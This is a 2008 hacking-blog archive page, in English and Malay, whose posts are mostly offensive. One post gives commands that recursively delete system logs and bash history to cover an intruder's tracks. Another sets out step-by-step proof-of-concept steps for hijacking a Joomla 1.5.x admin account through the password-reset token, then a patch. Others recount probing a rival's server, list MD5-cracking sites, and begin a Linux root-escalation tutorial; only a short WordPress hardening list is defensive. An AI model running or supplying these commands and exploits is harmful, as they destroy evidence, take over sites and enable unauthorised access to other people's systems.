Archive for the 'Network Security' Category

Housekeeping

August 16th, 2008

rm -rf /var/log rm -rf /var/adm rm -rf /var/apache/log rm -rf $HISTFILE find / -name .bash_history -exec rm -rf {} \; find / -name .bash_logout -exec rm -rf {} \; find / -name log* -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \;

p/s : Use to delete your log at ur own risk..

Share This Post

 

Posted by Mr Am | Filed in Hacker, Network Security, hacking, linux | 2 Comments »

 

Joomla 1.5.x Remote Admin Password Change

August 14th, 2008

####################################################
#### Joomla 1.5.x Remote Admin Password Change ####
####################################################

Bug : http://www.milw0rm.com/exploits/6234
Patch : click here
POC :

1. Go to url : www.target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field “token” char ‘ and Click OK.
3. Write new password for admin
4. Go to url : www.target.com/administrator/
5. Login admin with new password

Upgrade to latest Joomla! version (1.5.6 or newer)

0r

Add the following code to global $mainframe; on line 113 of reset.php

[sourcecode language='php']

if(strlen($token) != 32) {
$this->setError(JText::_(’INVALID_TOKEN’));
return false;

}

[/sourcecode]

Share This Post

 

Posted by Mr Am | Filed in Bug, Hacker, Network Security, hacking | 2 Comments »

 

XSS scanner by d3hydr8

July 19th, 2008

Read the rest of this entry »

Share This Post

 

Posted by Mr Am | Filed in Hacker, IT, Network Security, Programming, hacking | Comment now »

 

How to secure your wordpress blog

July 15th, 2008

  1. Use latest stable version of Wordpress. Don’t use beta version!
  2. Your database table prefix must be other than default prefix (wp_) - Securing against sql injection.
  3. Wordpress version must be hidden - Many hackers take this advantage to attack wordpress in version that vulnerable. So, let them know nothing.
  4. Must be no user “admin” - this should be guested during sql injection. If u used it.. change it now.
  5. Put .htaccess in yout /wp-admin/ directory. - avoid directory listing.
Share This Post

 

Posted by Mr Am | Filed in Hacker, Network Security, Wordpress, hacking | 2 Comments »

 

YM bersama security expert..

May 16th, 2008

Tengah aku ber”ym” dengan Ahli Jiwa, screen aku tibe2 bergegar(buzz), dengan salam xbg.. xpe, aku teruskan chat ngan dia.. tengok log chat aku ngan security expert ni..

dia : ko tau hack??

aku : xtau la bro.. bro leh tolong ajar ke??

dia : ko nak aku ajar ke?

aku : bro nak ajar ape?

dia : aku kan security expert, ko cakap je nak bljr apa.. <– ayat ni wat aku xleh blah..

aku : owh.. boleh la ajar aku semua, sbb aku xtau apa2 pasal computer ni

dia : ko byk lagi kena bljar ni <– ayat yang wat aku rase nak ddos je dia nye server

aku : mmg la bro.. aku mmg xtau pape pon.. kena byk berlajar lagi ni..

dia : ni tengok site aku ni.. www.xxx.com, try la pentest.

aku : mmg aku xkan dapat la bro.. scan port pon aku xreti.. ko lom ajar aku lagi..

Otak gatal aku dah mula pikir nak wat jahat je bila jumpa org berlagak camni.. Aku pon, terus je reboot PC aku..vista ke fc8. Emm.. biasa la.. OPss.. kepada Ahli Jiwa, sory sbb aku ckp kat ko aku terdc.. padahal mmg aku dckan sbb nak tukar os.. Pastu, aku pun teruskan la keje-keje nakal aku tu.. mmg expert mamat ni, lama gile aku try, mmg xtelus dia punya site.. Hey.. aku bukan jenis yang cepat putus asa la.. dalam kepala otak aku “nobody’s system is save”, tu je leh wat aku xgiveup bila pentest ni.. Mmg aku pikir, klu xjumpa malam ni, aku xkan masuk tdo.. korek punya korek, jumpa la satu.. bug ni xbesar sgt pon, tp leh ar wat aku rase puas ati…

kepada “dia” : aku nasihatkan ko, jangan berlagak sangat.. ko rase ko hebat, ramai lagi yang lagi hebat dari ko.. Owh ya, system ko tu, dah xsecure, bila2 je aku leh downkan.. go and patch it..

Share This Post

 

Posted by Mr Am | Filed in IT, Network Security, SERVER, System, linux | 6 Comments »

 

Online MD5 cracker

March 22nd, 2008

http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
http://www.md5-db.com/
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/ Read the rest of this entry »

Share This Post

 

Posted by Mr Am | Filed in Network Security, SERVER, System | Comment now »

 

Ubuntu..

March 22nd, 2008

2 Bulan lepas aku ade request CD ubuntu.. hehe.. akhirnya sampai jugak.. wah.. kali ni xde cd yang ilang..

biasannya.. bile aku tempah cd dari oversea.. mmg hasilnya sedih la..

klu cd tu 3 keping.. yang sampai.. cuma 1 or 2 keping jer.. dah tu, siap terbuka lagi, plg teruk lgsung xsampai.. ish2.. tension aku.. tp klu ni lain.. siap tertutup rapi lagi. .

Emm.. actly, cd tu dah lama sampai.. cuma ari ni tergerak ati nak try install Ubuntu.. selama ni aku setia ngan FC jer.. hehe.. FC8 mmg best.. tp ubuntu pon ok ar.. UBUNTU + BERYL = 3D DESKTOP..

 

WINDOWS CAN’T DO LIKE THIS, EVEN VISTA..

Share This Post

 

Posted by Mr Am | Filed in My Life, Network Security, SERVER, System | Comment now »

 

LINUX ROOTING..

February 19th, 2008

Bagi sesiapa yang lupa password utk root.. di sini sy bg satu tutorial macam macam nak jadikan user biasa supaya ada access SU (uid=0 and gid=0)..

1) uname -a

Linux xxx.xxx.xxx 2.6.9-22.ELsmp #1 SMP Mon Feb 18 20:32:14 EDT 2008 i686 i686 i386 GNU/Linux
uid=500(user) gid=500(user) groups=500(user)

>> kernel 2.6.x.

>> main target, jadikan “user” dari gid “user” menjadi gid=0 Read the rest of this entry »

Share This Post

 

Posted by Mr Am | Filed in IT, Network Security, SERVER | Comment now »

 

Recoded by crime_genius86 |
Hosted by My Online Hoster |